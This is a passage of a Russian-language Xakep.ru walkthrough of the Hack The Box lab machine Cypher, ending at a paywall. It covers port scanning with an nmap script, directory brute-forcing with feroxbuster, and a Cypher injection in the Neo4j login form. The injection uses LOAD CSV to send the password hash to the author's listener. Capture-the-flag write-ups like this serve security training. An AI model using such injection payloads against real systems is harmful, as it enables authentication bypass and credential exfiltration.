HTB Cypher. Эксплуатируем Cypher Injection в Neo4j

Содержание статьи

Разведка
Сканирование портов
Точка входа
Точка опоры
Продвижение
Локальное повышение привилегий

Сегодня я покажу, как при помощи инъекции кода на языке Cypher можно атаковать графовую базу данных Neo4j и обойти авторизацию. Затем мы проведем инъекцию команд ОС и получим сессию на хосте, а собрав учетные данные, сменим пользовательскую сессию и повысим привилегии через регистрацию своего модуля для BBOT.

Наша цель — получение прав суперпользователя на машине Cypher с учебной площадки Hack The Box. Уровень сложности задания — средний.

warning

Подключаться к машинам с HTB рекомендуется с применением средств анонимизации и виртуализации. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.

Разведка

Сканирование портов

Добавляем IP-адрес машины в /etc/hosts:

10.10.11.57    cypher.htb

И запускаем сканирование портов.

Справка: сканирование портов

Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.

Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '
' ',' | sed s/,$//)
nmap -p$ports -A $1

Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция -A).

Сканер нашел два открытых порта:

22 — служба OpenSSH 9.6p1;
80 — веб‑сервер Nginx 1.24.0.

По отчету Nmap видно, что веб‑сервер выполняет редирект на сайт http://cypher.htb. Там нас встретит сайт с графом и ссылкой на страницу авторизации.

Точка входа

Я попробовал вставить в форму авторизации базовую нагрузку, которая бы помогла обойти авторизацию, если бы сработала инъекция admin' or 1=1 -- -. Однако получаем огромный текст ошибки.

Удобнее просмотреть текст в Burp History. Нам отображается часть запроса на языке Cypher, который используется на сервере.

Про Cypher-инъекции я уже писал в одном из райтапов. По запросу видно, что хеш пароля возвращается как значение h.value. Выполним инъекцию и эксфильтруем на свой веб‑сервер значение хеша. Сам сервер создаем командой python3 -m http.server.

admin' OR 1=1 LOAD CSV FROM 'http://10.10.16.73:8000/?value='+h.value AS hash Return ''//

Попытки пробрутить хеш ни к чему не привели, поэтому попытаемся найти еще что‑нибудь интересное.

Точка опоры

Попробуем перебрать каталоги и файлы при помощи feroxbuster.

Справка: сканирование веба c feroxbuster

Одно из первых действий при тестировании безопасности веб‑приложения — это сканирование методом перебора каталогов, чтобы найти скрытую информацию и недоступные обычным посетителям функции. Для этого можно использовать программы вроде dirsearch, DIRB или ffuf. Я предпочитаю feroxbuster.

При запуске указываем следующие параметры:

-u — URL;
-w — словарь (я использую словари из набора SecLists);
-d — глубина сканирования;
-t — количество потоков.

Задаем все параметры и запускаем перебор:

feroxbuster -u http://cypher.htb/ -w directory_2.3_medium_lowercase.txt -d 1 -t 128

Результат сканирования каталогов с помощью feroxbuster

Среди эндпоинтов есть интересные: /api и /testing. На первом всегда Not Found, а вот каталог /testing не имеет индекс‑файла, и поэтому мы получаем список файлов в каталоге.

Продолжение доступно только участникам

Материалы из последних выпусков становятся доступны по отдельности только через два месяца после публикации. Чтобы продолжить чтение, необходимо стать участником сообщества «Xakep.ru».

Присоединяйся к сообществу «Xakep.ru»!

Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее

← Ранее Разработчики PyPI сняли блокировку с inbox[.]ru

Далее → Для RCE-уязвимости в камерах наблюдения LG не будет патча